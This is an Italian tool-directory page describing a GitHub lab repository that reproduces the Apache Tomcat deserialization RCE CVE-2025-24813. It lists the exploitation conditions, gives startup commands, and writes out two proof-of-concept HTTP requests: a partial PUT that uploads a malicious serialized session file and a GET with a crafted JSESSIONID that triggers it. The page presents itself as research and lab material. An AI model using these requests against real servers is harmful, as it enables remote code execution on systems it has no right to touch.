Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-24813 — tomcat CVE-2025-24813 ambiente di deserializzazione RCE | Kitploit
Strumenti/GitHubGitHub/x1ongsec/cve-2025-24813
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebApprendimento e FormazioneLab e Pratica
GitHubx1ongsec/cve-2025-24813

CVE-2025-24813

tomcat CVE-2025-24813 ambiente di deserializzazione RCE

Vedi Repository
1 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Descrizione

Questo repository fornisce l'ambiente per la riproduzione della recente RCE CVE-2025-24813 su Tomcat.

Solo per scopi di studio e ricerca!

Condizioni di sfruttamento

  • L'applicazione ha abilitato la funzione di scrittura di DefaultServlet, disabilitata per impostazione predefinita
  • L'applicazione supporta richieste PUT parziali (partial PUT), consentendo di scrivere dati serializzati malevoli nei file di sessione; questa funzione è abilitata per impostazione predefinita
  • L'applicazione utilizza la persistenza delle sessioni su file di Tomcat con la posizione di archiviazione predefinita; è necessaria una configurazione aggiuntiva
  • L'applicazione include una libreria vulnerabile alla deserializzazione, ad esempio commons-collections presente nel classpath. Questa condizione dipende dall'eventuale dipendenza dell'implementazione da librerie con catene di deserializzazione sfruttabili

Questo ambiente ha già attivato le condizioni necessarie per la riproduzione sopra elencate

Avvio di Tomcat

Linux:

root@kitploit:~
chmod +x apache-tomcat-9.0.98/bin/*
apache-tomcat-9.0.98/bin/catalina.sh run

Windows:

root@kitploit:~
apache-tomcat-9.0.98/bin/catalina.bat run

Visitare: http://127.0.0.1:9001/

image

POC

Generare un file serializzato malevolo e caricarlo utilizzando il seguente pacchetto. Assicurarsi che il valore del chunk in Range corrisponda a Length e sia maggiore della lunghezza corrente del file.

root@kitploit:~
PUT /xxxxx/session HTTP/1.1  
Host: 192.168.131.32:8080  
Content-Length: 1000  
Content-Range: bytes 0-1000/1200  

{{contenuto del file serializzato}}}

Utilizzare il seguente POC per attivare:

root@kitploit:~
GET / HTTP/1.1  
Host: 192.168.131.32:8080  
Cookie: JSESSIONID=.xxxxx
image image

Riferimento: https://forum.butian.net/article/674

Scarica lo strumento